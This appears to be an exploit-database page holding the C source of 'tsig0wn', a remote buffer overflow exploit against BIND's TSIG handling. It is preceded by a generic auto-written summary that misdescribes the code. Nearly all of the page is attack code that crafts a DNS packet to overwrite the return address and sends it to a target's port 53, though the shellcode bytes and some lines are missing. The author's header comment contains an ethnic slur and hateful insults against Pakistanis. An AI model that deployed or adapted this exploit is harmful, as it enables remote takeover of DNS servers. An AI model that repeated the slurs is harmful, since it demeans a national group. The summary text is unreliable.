Suggest Exploit
Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
Buffer Overflow
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This code contains a buffer overflow vulnerability. The shellcode is stored in the 'shellcode' variable and is executed when the vulnerable function is called. The vulnerability can be exploited by sending a specially crafted input to the vulnerable function, causing it to overwrite memory beyond the buffer boundaries. This can lead to arbitrary code execution.


To mitigate this vulnerability, the code should be reviewed and the vulnerable function should be rewritten to ensure that buffer boundaries are not exceeded. Input validation and proper buffer handling should be implemented to prevent buffer overflows.

Exploit-DB raw data:

 * tsig0wn.c
 * Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
 * gneisenau@berlin.com
 * The author is not and will not be held responsible for the action of 
 * other people using this code.
 * provided for informational purposes only
 * since a greetz section is de rigeur
 * greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
 * a special fuck to all pakis including those idiots from GForce, etc....
 * but then pakistan is one big village comprising exclusively of prize idiots
 * tabstop set at 3
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include	<netdb.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

 * This shellcode sux. cant ever get around to coding another one.
char shellcode[] = {

#define NS_T_TSIG 250
#define DUMMY_ARG_OFFSET 176
#define ENUM_FILE 1				//eventlib_p.h line 141

struct {
	char 				*system_name;
	unsigned int	buffer_start;			/* the address where out buffer starts in memory */
	unsigned int	frame_pointer;			/* content of the frame pointer */
	int				garbage_len;			/* length of the garbage in which we will embed ebp|eip */
} system[] =	{
						{ "Test value 1", 0xbffff640, 0xbffff868, 326, },
						{ "Test value 2", 0xbffff5f0, 0xbffff700, 326, },
						{ "Slackware 7.0", 0xbffff590, 0xbffff7e8, 326, },
						{ NULL, 0x0, 0x0, },

void usage (void);
void encode_dns_name (char *, int, int);

main (int argc, char *argv[])
	char 						query[PACKETSZ];	// construct our query packet here
	char						*query_ptr;		// pointer to walk the query buffer
	HEADER					*hdr_ptr;		// pointer to the header part of the query buffer

	int						arg;
	unsigned int			buffer_start, 
								frame_pointer, // value the frame pointer will have
								shellcode_addr; // address our shellcode will have in the named buffer calculated from buffer_start
	int						index;

	char						*target_name;
	struct hostent			*target_host;	
	struct sockaddr_in	target;		
	int						sockfd;

	if (argc < 2)
		usage ();

	while ((arg = getopt (argc, argv, "b:f:s:")) != -1) {
		switch (arg){
			case 'b':	sscanf (optarg, "%x", &buffer_start);
			case 'f':	sscanf (optarg, "%x", &frame_pointer);
			case 's':	index = atoi (optarg) - 1; 
							buffer_start = system[index].buffer_start;
							frame_pointer = system[index].frame_pointer;
			default :	usage ();
	if (!(target_name = argv[optind])){
		fprintf (stderr, "tsig0wn: abysmal m0r0n error\n");
		exit (1);

 * Form a header. 
 	memset (query, 0, PACKETSZ);
 	// cud blow up on other architectures not as liberal as x86. an union like in the bind sources is the correct way to go.
	hdr_ptr = (HEADER *)query;
	hdr_ptr->id = htons (0x1234);			
	hdr_ptr->qr = 0;					
	hdr_ptr->opcode = 0;					
	hdr_ptr->qdcount = htons (2);			
	hdr_ptr->arcount = htons (1);	

 * Form a query after the header where we put in the shellcode
	query_ptr = (char *) (hdr_ptr + 1);
	memcpy (query_ptr, shellcode, strlen (shellcode)+1);
	query_ptr += strlen (shellcode) + 1;
	PUTSHORT (T_A, query_ptr);
	PUTSHORT (C_IN, query_ptr);

 * we form another header here that contains garbage with embedded stuff
 * i cud have put this in the same header as the shellcode and have the
 * shellcode nullify. (shrug)
		char *tmp;
		unsigned long dummy_argument = buffer_start+DUMMY_ARG_OFFSET;

		frame_pointer &= 0xffffff00; // zero out the LSB like the overflow in ns_sign will do

		// this will make layout a domain name for the second query, within which
		// we will embed our ebp | eip
		encode_dns_name (query_ptr, system[index].garbage_len, (frame_pointer - buffer_start) - (query_ptr - query));
		query_ptr += system[index].garbage_len;

		shellcode_addr = buffer_start + SHELLCODE_OFFSET;
		printf ("buffer starts at address = 0x%x\n", buffer_start);
		printf ("saved frame pointer after overwrite = 0x%x\n", frame_pointer);
		printf ("shellcode will reside at address = 0x%x\n", shellcode_addr);
		printf ("dummy argument will reside at address = 0x%x\n", dummy_argument);
		// put in the type member of evEvent_p. File is what we need
		tmp = query + DUMMY_ARG_OFFSET;
		tmp[0] = ENUM_FILE;
		tmp[1] = ENUM_FILE >> 8;
		tmp[2] = ENUM_FILE >> 16;
		tmp[3] = ENUM_FILE >> 24;

		// embed the addresses. These will be interpreted as ebp and eip. 
		// we put the address where our shellcode will be situated twice.
		// we overflow the saved frame pointer of datagram_read(). when the
		// function returns to __evDispatch() it calls __evDrop().
		// because we have shifted the frame pointer and thus __evDispatch()
		// notion of the stack we also provide two pointers as arguments to
		// __evDispatch. These pointers point to the start of this query header
		// name, within which __evDrop will look for evEvent_p->type. we set
		// type to be of type 'file' above which causes it to break and execute 
		// FREE() which in turn calls free().
		tmp = query + (frame_pointer - buffer_start);	// advance the ptr to the place where we put in our ebp|eip
		tmp[0] = shellcode_addr;
		tmp[1] = shellcode_addr >> 8;
		tmp[2] = shellcode_addr >> 16;
		tmp[3] = shellcode_addr >> 24;
		tmp[4] = shellcode_addr;
		tmp[5] = shellcode_addr >> 8;
		tmp[6] = shellcode_addr >> 16;
		tmp[7] = shellcode_addr >> 24;

		tmp[8] = dummy_argument;
		tmp[9] = dummy_argument >> 8;
		tmp[10] = dummy_argument >> 16;
		tmp[11] = dummy_argument >> 24;
		tmp[12] = dummy_argument;
		tmp[13] = dummy_argument >> 8;
		tmp[14] = dummy_argument >> 16;
		tmp[15] = dummy_argument >> 24;
	PUTSHORT (T_A, query_ptr);
	PUTSHORT (C_IN, query_ptr);
 * Additional section containing T_SIG stuff
 	// a name with only one char
	memcpy (query_ptr, "\x01m\x00", 3); 
	PUTSHORT (NS_T_TSIG, query_ptr);
	PUTSHORT (C_IN, query_ptr);
// these members wont be checked at all as find_key returns NULL on testing secretkey_info. 
//	PUTLONG (0, query_ptr);			
//	PUTSHORT (0, query_ptr);				

 * Connect and deliver the payload
	if (!(target_host = gethostbyname (target_name))){
		fprintf (stderr, "host name resolution error for %s: %s\n", target_name, hstrerror (h_errno));
		exit (1);
	if ((sockfd = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0){
		perror ("socket");
		exit (1);
	memset (&target, 0, sizeof (target));
	target.sin_family = AF_INET;
	target.sin_port = htons (53);
	target.sin_addr.s_addr = ((struct in_addr *)target_host->h_addr_list[0])->s_addr;

	if (connect (sockfd, &target, sizeof (target)) < 0){
		perror ("connect");
		exit (1);
	if (send (sockfd, query, query_ptr - query, 0) < 0){
		perror ("send");
		exit (1);
	exit (0);

usage (void)
	int i;
	fprintf (stderr, "                             tsig0wn\n");
	fprintf (stderr, "Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau\n");
	fprintf (stderr, "\nAvailable System Types\n");
	for (i = 0; system[i].system_name; i++)
		fprintf (stderr, "%d. %s\n", i+1, system[i].system_name);
	fprintf (stderr, "\nUsage:\n");
	fprintf (stderr, "tsig0wn [ -s system type ] target\nor\n");
	fprintf (stderr, "tsig0wn [ -b buffer start address ] [ -f frame pointer content ] target\n");
	exit (1);

 * a pretty convoluted function.
 * len is the number of octects to fill in (including the length octect)
 * embed_pos is the position where we need to embed this |len|ebp|eip|. 
 *	Hopefully when we overwrite the saved ebp on the stack
 * we expect it to point here and take the eip (which in turn points to our
 * shellcode) from here. The challenge here is to lay out the octets so 
 * that it doesnt clash with embed_pos.

encode_dns_name (char *buf, int len, int embed_pos)
	int	ctr = 0;
	int	adjusted = 0;
	embed_pos -= 2;		// our ebp | eip needs the length octet before it, so adjust for it now + 1 
	len--;					// for the NULL octet at the end.

	// sanity check
	if (embed_pos >= len){
		fprintf (stderr, "encode_dns_name: embed_pos >= len\n");
		exit (1);
	while (ctr < len)
		// max 63 octets allowed + preceding 1 octet for length
		if (ctr+64 <= len){ 	// enough space for another 63+1
			if (ctr+64 <= embed_pos || adjusted){	// embed_pos not in between
				*buf++ = 63;
				memset (buf, 'g', 63); buf += 63;
			else {				// need to adjust cuz embed_pos in between
				*buf++ = embed_pos-ctr-1;
				memset (buf, 'o', embed_pos-ctr-1); buf += embed_pos-ctr-1; 
				ctr+= embed_pos-ctr; 
		else {
			if (len - ctr <= embed_pos || adjusted){ // only remaining len - ctr
				*buf++ = len-ctr-1;
				memset (buf, 'g', len-ctr-1);
				ctr += 63; // we are quitting anyway after this. no need to update ctrs
				*buf++ = embed_pos-len-ctr-1;
				memset (buf, 'o', embed_pos-len-ctr-1); buf += embed_pos-len-ctr-1; 
				ctr += embed_pos-len-ctr; 
	*buf=0x00; 	// finish with a 0 

// milw0rm.com [2001-03-01]